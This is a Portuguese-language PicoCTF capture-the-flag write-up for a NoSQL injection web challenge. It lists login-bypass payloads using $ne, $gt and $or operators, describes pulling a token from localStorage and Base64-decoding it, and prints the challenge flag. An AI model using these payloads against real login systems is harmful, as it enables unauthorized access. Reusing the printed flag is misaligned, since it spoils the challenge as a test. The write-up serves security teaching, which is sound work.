NoSQL Injection

Autor: NGIRIMANA Schadrac Plataforma: PicoCTF Categoria: Web Exploitation Dificuldade: Média

Desafio

Este desafio explora uma vulnerabilidade de NoSQL Injection para obter acesso ao sistema sem credenciais válidas. O objetivo principal é encontrar a flag utilizando NoSQL Injection.

Solução

1. Análise inicial

Ao acessar o site, foi identificado um formulário de login que solicita email e senha.

No console do navegador, é exibida uma mensagem indicando que, após um login bem-sucedido, um token será armazenado no localStorage.

2. Explorando a vulnerabilidade de NoSQL Injection

Objetivo:

Efetuar o login sem fornecer credenciais válidas, explorando uma vulnerabilidade de NoSQL Injection.

Exemplos de NoSQL Injection:

Utilizando $ne (not equal):
- Email:
  { "$ne": null }
- Senha:
  { "$ne": null }
  Esse payload ignora qualquer validação ao verificar que o valor não é nulo.
Usando $gt (maior que):
- Email:
  { "$gt": "" }
- Senha:
  { "$gt": "" }
  Permite valores que sejam "maiores" do que uma string vazia, efetivamente ignorando verificações.
Forçando condições verdadeiras com $or:
- Email:
  { "$or": [{ "admin": true }, { "email": { "$ne": null } }] }
- Senha:
  { "$ne": null }
  Esse payload verifica múltiplas condições, aceitando o login se uma delas for verdadeira.

No desafio foi utilizado:

No campo email:

{ "$ne": "null" }

E no campo senha:

{ "$ne": "null" }

Essa abordagem foi bem-sucedida e confirmou a vulnerabilidade do sistema.

3. Recuperando o token

Após o login bem-sucedido, um token é armazenado no localStorage. Para acessá-lo:

Abra o console do navegador.
Navegue até a aba Application.
No menu lateral, vá para Storage > Local Storage.
Localize o token armazenado.

4. Decodificando o token

O token encontrado está em formato Base64. Para decodificá-lo:

Copie o token.
Utilize uma ferramenta ou método para decodificação Base64.

5. Flag

Após decodificar o token, a flag será exibida no formato:

picoCTF{jBhD2y7XoNzPv_1YxS9Ew5qL0uI6pasql_injection_25ba4de1}

Autor da WriteUp

Membro de Networking - jvittor1

AnteriorFindMe PróximoSecrets

Atualizado há 12 meses

hashtagDesafio

hashtagSolução

hashtag1. Análise inicial

hashtag2. Explorando a vulnerabilidade de NoSQL Injection

hashtagObjetivo:

hashtagExemplos de NoSQL Injection:

hashtagNo desafio foi utilizado:

hashtag3. Recuperando o token

hashtag4. Decodificando o token

hashtag5. Flag

hashtagAutor da WriteUp